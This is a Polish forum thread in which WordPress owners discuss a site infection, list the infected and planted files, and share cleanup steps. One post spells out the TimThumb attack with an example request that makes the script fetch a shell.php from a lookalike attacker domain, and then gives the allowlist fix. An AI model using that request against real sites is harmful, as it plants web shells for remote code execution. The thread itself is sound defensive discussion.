Wirus na stronie z WP. Jak działać?

[Nikosis]

Paq - ten błąd jest bardzo często jak masz gdzieś "BOM" w pliku (problem z kodowaniem).

[Paq]

Z tym, że nie edytowałem plików (błąd pojawił się nagle, od tak) ani notatnikiem, ani niczym innym co zmieniałoby kodowanie z bez BOM na BOM, ale dzięki za informacje - będę to męczył.

[Paq]

Temat wirusa jeszcze nie został wyczerpany. Ważne - (więc wybaczcie mi post pod postem). U mnie jeszcze zarażony był plik wp-settings.php oraz wp-config.php (linia 2097 wysyła dane i hasła do autora!) chociaż skaner ich nie wykrywał. Sprawdźcie swoje pliki, bo jest tego więcej i nadal Wasze dane są ogólnodostępne. Wszystkim zainteresowanym polecam tę lekturę, bo wirus pchał się też w inne pliki.

[mkr]

Paq w takich wypadkach najszybszym rozwiązaniem jest

- backup zewnętrzny,

- usunięcie wszystkich plików z FTP,

- zmiana haseł mysql/ftp,

- wgranie czystego WordPress i wtyczek

- wgranie grafik użytych we wpisach ( przejrzeć katalogi czy nie mają ukrytych plików php )

- wgranie layoutu od nowa ( lub gdy był modyfikowany dokładne sprawdzenie plików i zawartości katalogów np. z JS.

- uzupełnienie wp-config.php odpowiednimi danymi.

Oczywiście przy założeniu, że luka przez którą uzyskano dostęp jest załatana.

Kilka do kilkunastu minut i strona już działa.

W zależności od rodzaju infekcji modyfikowane są pliki, dodawane są w możliwie najgłębszych katalogach pliki php a spotkałem się nawet z modyfikacją .htaccess i rewrite

[DanielBurchardt]

Atak polega na podszyciu się pod serwis np. youtube.com w taki sposób:

www.youtbue.com.domenaatakujacego.pl

i wykonaniu żądania:

timthumb.php?src=www.youtbue.com.domenaatakujacego.pl/shell.php

Plik zostanie utworzony w folderze cache a jego nazwa to (md5).php dzięki czemu możemy wykonać dowolny kod.

Rozwiązaniem problemu jest zamiana:

$allowedSites = array (

'flickr.com',

'picasa.com',

'blogger.com',

'wordpress.com',

'img.youtube.com',

);

na

$allowedSites = array ();

Dzięki czemu wyłączmy zaufane adresy i możemy nadal korzystać ze skryptu.

Z tego co spojrzałem dużo stron jest na to podatne.

[yellow]

UWAGA!

Kiedy opisywalem powyzszy problem, ktory mnie także dotknął - wszyscy na zagranicznych forach pisali o bibliotece timthumb. Wykluczylem ja - jako, że z niej nie korzystalem ALE jak sie okazalo dwa moje pluginy korzystaly!

Plikow do usuniecia jest wiecej niz tu opisanych.

Do usuniecia:

/wp-content/upd.php - do usunięcia

/wp-admin/upd.php - do usunięcia

/wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php - lub podobny, do usunięcia

/wp-content/uploads/feed-file.php - do usunięcia

/wp-content/uploads/feed-files.php - do usunięcia

/wp-admin/common.php - do usunięcia

Więcej info o tym włamaniu opisałem na blogu: włamanie wordpress counter-wordpress.com

edit: dopiero zauwazylem ze Paq juz lina do mojego bloga dodal ;_)

[3mperorr]

Widzę, że nie tylko mnie to dotknęło

Dzisiaj rano miałem zdziwko jak nie mogłem się zalogować do panelu. Całe FTP przetrzepałem.

te pliki miałem

wp-content/upd.php

wp-admin/upd.php

zmieniony wp-config i wp-settings

oraz problemy z wtyczką seo-ultimate

[yellow]

Pamiętajcie przetrzepać katalogi pluginow w poszukiwania TimThumb.php - wszelkie pluginy ktore skaluja grafike z pewnoscia z niej skorzystaja. Pobierzcie aktualizacje i nadgrajcie go.

[3mperorr]

No i po skończonej robocie hasła pozmieniać do wszystkiego. Nie wiadomo co to pobrało.

[gniotek]

Ja u siebie nigdzie nie znalazłem timthumb.php a i tak dostałem zarażenie strony.

Podobne skutki, pomogło naturalnie wgranie nowych plików szablonu + wordpress. Obecnie nie wiem jak się przed tym całkowicie zabezpieczyć, ale mam nadzieję, że aktualizacje coś pomogły.

[przemeks]

Cholera, moja strona trafiła na czarną listę. Wyczyściłem już wszystko, a przynajmniej tak mi się wydaję. Ile może trwać zweryfikowanie strony przez G?

[Carnagge]

do 24h

[spry]

Witam,

Mam to samo. Czyli problem. Znalazłem timthumb.php który zaszyty był w templatce. Jak wy edytujecie te l10.js jquery.js bo ja nigdzie nie znalazłem dokładnie takiego kodu o jakim pisaliście. Niestety Wyświetla się cały czas komunikat o złośliwym oprogramowaniu na stronie. Nie znalazłem również plików o których była mowa wyżej tych co do kasowania. Te dwa l10.js jquery.js nadpisałem. nic to nie zmieniło. Jak tego szukać, jak sobie z tym radzić? No i mam podejżenia że ten kodzik wlepił mi się do sklepu na preście. Jak szukać na serwerze tego bagna?

[mkr]

Witam,

Mam to samo. Czyli problem. Znalazłem timthumb.php który zaszyty był w templatce. Jak wy edytujecie te l10.js jquery.js bo ja nigdzie nie znalazłem dokładnie takiego kodu o jakim pisaliście. Niestety Wyświetla się cały czas komunikat o złośliwym oprogramowaniu na stronie. Nie znalazłem również plików o których była mowa wyżej tych co do kasowania. Te dwa l10.js jquery.js nadpisałem. nic to nie zmieniło. Jak tego szukać, jak sobie z tym radzić? No i mam podejżenia że ten kodzik wlepił mi się do sklepu na preście. Jak szukać na serwerze tego bagna?

Najszybciej plików zmienianych np. w ostatnich 2 tygodniach. ( wyszukiwanie FTP w FlashFXP ) czy też sortowanie plików według daty zmiany.